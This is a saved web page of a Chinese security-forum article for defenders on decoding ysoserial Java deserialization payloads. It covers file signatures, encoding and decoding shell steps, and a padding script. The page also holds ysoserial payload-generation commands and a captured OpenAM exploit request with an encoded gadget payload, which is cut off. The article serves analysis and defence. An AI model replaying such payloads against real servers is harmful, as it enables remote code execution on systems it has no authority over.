mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-06 19:24:02 +00:00
539 lines
2.7 MiB
HTML
539 lines
2.7 MiB
HTML
|
<!DOCTYPE html> <html><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/share/2785
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
|
|||
|
|
<title>一种 ysoserial.jar 反序列化Payload的解码</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content="奇安信攻防社区-一种 ysoserial.jar 反序列化Payload的解码">
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media(max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}ul{margin-top:0;margin-bottom:10px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and (orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(max-width:767px){}@media(min-width:768px) and (max-width:991px){}@media(min-width:768px) and (max-width:991px){}@media(m
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}</style>
|
|||
|
|
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
|
|||
|
|
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment,.hljs-variable{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-string{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50" style="display:none !important">
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center" style="display:none !important">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main">
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">一种 ysoserial.jar 反序列化Payload的解码</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
ysoserial大家平时多用于生成Payload,但是作为蓝队,我们更多的是想法子去解码Payload!
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>0x00 前言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
小伙伴在分析告警的时候,发现反序列化告警,Payload类似`AKztAA`,不知道咋解,于是有了本文。
|
|||
|
|
|
|||
|
|
0x01 文件头
|
|||
|
|
--------
|
|||
|
|
|
|||
|
|
开始之前,先来复习一些涉及到的一些文件头
|
|||
|
|
|
|||
|
|
以`rO0AB`开头,java序列化base64编码的数据
|
|||
|
|
以`aced`开头,java序列化的16进制
|
|||
|
|
以上两个,都可以用 <https://github.com/phith0n/zkar> 和https://github.com/NickstaDB/SerializationDumper 去解析
|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译
|
|||
|
|
|
|||
|
|
有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了
|
|||
|
|
|
|||
|
|
0x02 原始payload
|
|||
|
|
--------------
|
|||
|
|
|
|||
|
|
生成Payload
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
查看生成的Payload的十六进制
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
hexdump -C raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
显然,以`aced`开头,java序列化的16进制,使用`zkar解析`
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后查看生成的文件,应该可以找到下图:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
以`cafebabe`开头,java class文件的16进制,保存成class,拖到idea中反编译即可。
|
|||
|
|
|
|||
|
|
0x03 编码替换的Payload
|
|||
|
|
-----------------
|
|||
|
|
|
|||
|
|
我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的`AKztAAV`开头的Payload,对于这类Payload的解码流程,基本上就是先补等号,替换`_`和`-`为`/`和`+`,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到`ca fe`开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
这种Payload 一般执行如下命令:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
命令的意思是,使用`ysoserial.jar`生成一个指定`Click1`这个gadget 去执行`touch /tmp/xx`命令的序列化的Payload,然后在该Payload的前面插入一个空字节(`\x00`),之后对其进行base64编码,编码后的内容,将`/` 替换为 `_`,和 `+` 替换为 `-`,最后将`=`去掉。
|
|||
|
|
|
|||
|
|
&gt; 替换`/`和`+`是因为 base64 编码的输出可能包含 `/` 和 `+` 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题。
|
|||
|
|
|
|||
|
|
拆开如下:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
java -jar ysoserial.jar Click1 "touch /tmp/xx" > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (echo -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr '/+' '_-' | tr -d '=' > raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat raw_payload_00_base64_replace.bin | tr '_-' '/+' > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后执行下面的shell脚本
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
#!/bin/bash
|
|||
|
|
|
|||
|
|
file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)
|
|||
|
|
|
|||
|
|
# 移除可能存在的换行符
|
|||
|
|
base64_string=$(echo -n "$file_content" | tr -d '\n')
|
|||
|
|
|
|||
|
|
# 计算base64编码字符串长度
|
|||
|
|
length=${#base64_string}
|
|||
|
|
|
|||
|
|
# 计算需要补充的等号数量
|
|||
|
|
remainder=$((length % 4))
|
|||
|
|
padding=$(((4 - remainder) % 4))
|
|||
|
|
|
|||
|
|
# 补充等号
|
|||
|
|
if ((padding &gt; 0)); then
|
|||
|
|
padding_string=$(printf '=%.0s' $(seq 1 $padding))
|
|||
|
|
base64_string="$base64_string$padding_string"
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
echo "$base64_string"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这时候我们可以比对一下,看看是否还原成功
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
接下来开始还原第三步,base64解码即可:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
然后是第二步,跳过开头的空字节:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
最后就是拿过去让`zkar`解析了,这里不再重复了
|
|||
|
|
|
|||
|
|
0x04 实战
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
拿到攻击者的请求:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY